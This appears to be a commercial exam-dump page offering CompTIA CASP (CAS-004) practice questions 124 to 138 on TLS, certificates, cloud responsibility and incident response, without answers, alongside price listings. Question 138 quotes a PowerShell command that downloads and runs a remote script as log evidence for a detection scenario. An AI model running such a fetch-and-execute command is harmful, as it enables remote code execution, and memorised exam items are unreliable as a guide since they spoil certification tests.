Summer Limited Time 60% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: dealsixty

CAS-004 Exam Dumps - CompTIA CASP Questions and Answers

Question # 124

A security engineer is implementing a server-side TLS configuration that provides forward secrecy and authenticated encryption with associated data. Which of the following algorithms, when combined into a cipher suite, will meet these requirements? (Choose three.)

Options:

A.

EDE

B.

CBC

C.

GCM

D.

AES

E.

RSA

F.

RC4

G.

ECDSA

Buy Now
Question # 125

A security architect updated the security policy to require a proper way to verify that packets received between two parties have not been tampered with and the connection remains private. Which of the following cryptographic techniques can be used to ensure the security policy is being enforced properly?

Options:

A.

MD5-based envelope method

B.

HMAC SHA256

C.

PBKDF2

D.

PGP

Buy Now
Question # 126

A systems administrator at a web-hosting provider has been tasked with renewing the public certificates of all customer sites. Which of the following would BEST support multiple domain names while minimizing the amount of certificates needed?

Options:

A.

ocsp

B.

CRL

C.

SAN

D.

CA

Buy Now
Question # 127

To save time, a company that is developing a new VPN solution has decided to use the OpenSSL library within Its proprietary software. Which of the following should the company consider to maximize risk reduction from vulnerabilities introduced by OpenSSL?

Options:

A.

Include stable, long-term releases of third-party libraries instead of using newer versions.

B.

Ensure the third-party library implements the TLS and disable weak ciphers.

C.

Compile third-party libraries into the main code statically instead of using dynamic loading.

D.

Implement an ongoing, third-party software and library review and regression testing.

Buy Now
Question # 128

The Chief Information Security Officer is concerned about the possibility of employees downloading ‘malicious files from the internet and ‘opening them on corporate workstations. Which of the following solutions would be BEST to reduce this risk?

Options:

A.

Integrate the web proxy with threat intelligence feeds.

B.

Scan all downloads using an antivirus engine on the web proxy.

C.

Block known malware sites on the web proxy.

D.

Execute the files in the sandbox on the web proxy.

Buy Now
Question # 129

In a cloud environment, the provider offers relief to an organization's teams by sharing in many of the operational duties. In a shared responsibility model, which of the following responsibilities belongs to the provider in a Paas implementation?

Options:

A.

Application-specific data assets

B.

Application user access management

C.

Application-specific logic and code

D.

Application/platform software

Buy Now
Question # 130

A security analyst is reviewing SIEM events and is uncertain how to handle a particular event. The file is reviewed with the security vendor who is aware that this type of file routinely triggers this alert.

Based on this information, the security analyst acknowledges this alert Which of the following event classifications is MOST likely the reason for this action?

Options:

A.

True negative

B.

False negative

C.

False positive

D.

Non-automated response

Buy Now
Question # 131

A third-party organization has implemented a system that allows it to analyze customers' data and deliver analysis results without being able to see the raw data. Which of the following is the organization implementing?

Options:

A.

Asynchronous keys

B.

Homomorphic encryption

C.

Data lake

D.

Machine learning

Buy Now
Question # 132

An engineering team has deployed a new VPN service that requires client certificates to be used in order to successfully connect. On iOS devices, however, the following error occurs after importing the .p12 certificate file:

mbedTLS: ca certificate undefined

Which of the following is the root cause of this issue?

Options:

A.

iOS devices have an empty root certificate chain by default.

B.

OpenSSL is not configured to support PKCS#12 certificate files.

C.

The VPN client configuration is missing the CA private key.

D.

The iOS keychain imported only the client public and private keys.

Buy Now
Question # 133

A security consultant has been asked to identify a simple, secure solution for a small business with a single access point. The solution should have a single SSID and no guest access. The customer

facility is located in a crowded area of town, so there is a high likelihood that several people will come into range every day. The customer has asked that the solution require low administrative overhead

and be resistant to offline password attacks. Which of the following should the security consultant recommend?

Options:

A.

WPA2-Preshared Key

B.

WPA3-Enterprise

C.

WPA3-Personal

D.

WPA2-Enterprise

Buy Now
Question # 134

A new, online file hosting service is being offered. The service has the following security requirements:

• Threats to customer data integrity and availability should be remediated first.

• The environment should be dynamic to match increasing customer demands.

• The solution should not interfere with customers" ability to access their data at anytime.

• Security analysts should focus on high-risk items.

Which of the following would BEST satisfy the requirements?

Options:

A.

Expanding the use of IPS and NGFW devices throughout the environment

B.

Increasing the number of analysts to Identify risks that need remediation

C.

Implementing a SOAR solution to address known threats

D.

Integrating enterprise threat feeds in the existing SIEM

Buy Now
Question # 135

A company wants to implement a new website that will be accessible via browsers with no mobile applications available. The new website will allow customers to submit sensitive medical information securely and receive online medical advice. The company already has multiple other websites where it provides various public health data and information. The new website must implement the following:

• The highest form Of web identity validation

• Encryption of all web transactions

• The strongest encryption in-transit

• Logical separation based on data sensitivity

Other things that should be considered include:

• The company operates multiple other websites that use encryption.

• The company wants to minimize total expenditure.

• The company wants to minimize complexity

Which of the following should the company implement on its new website? (Select TWO).

Options:

A.

Wildcard certificate

B.

EV certificate

C.

Mutual authentication

D.

Certificate pinning

E.

SSO

F.

HSTS

Buy Now
Question # 136

The Chief Information Security Officer (CISO) is working with a new company and needs a legal “document to ensure all parties understand their roles during an assessment. Which of the following should the CISO have each party sign?

Options:

A.

SLA

B.

ISA

C.

Permissions and access

D.

Rules of engagement

Buy Now
Question # 137

A software development company is building a new mobile application for its social media platform. The company wants to gain its Users' rust by reducing the risk of on-path attacks between the mobile client and its servers and

by implementing stronger digital trust. To support users’ trust, the company has released the following internal guidelines:

* Mobile clients should verify the identity of all social media servers locally.

* Social media servers should improve TLS performance of their certificate status.

* Social media servers should inform the client to only use HTTPS.

Given the above requirements, which of the following should the company implement? (Select TWO).

Options:

A.

Quick UDP internet connection

B.

OCSP stapling

C.

Private CA

D.

DNSSEC

E.

CRL

F.

HSTS

G.

Distributed object model

Buy Now
Question # 138

A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file: powershell EX(New-Object Net.WebClient).DownloadString ('https://content.comptia.org/casp/whois.psl');whois

Which of the following security controls would have alerted and prevented the next phase of the attack?

Options:

A.

Antivirus and UEBA

B.

Reverse proxy and sandbox

C.

EDR and application approved list

D.

Forward proxy and MFA

Buy Now
Exam Code: CAS-004
Exam Name: CompTIA SecurityX Certification Exam
Last Update: Apr 25, 2025
Questions: 571
CAS-004 pdf

CAS-004 PDF

$34  $84.99
CAS-004 Engine

CAS-004 Testing Engine

$38  $94.99
CAS-004 PDF + Engine

CAS-004 PDF + Testing Engine

$54  $134.99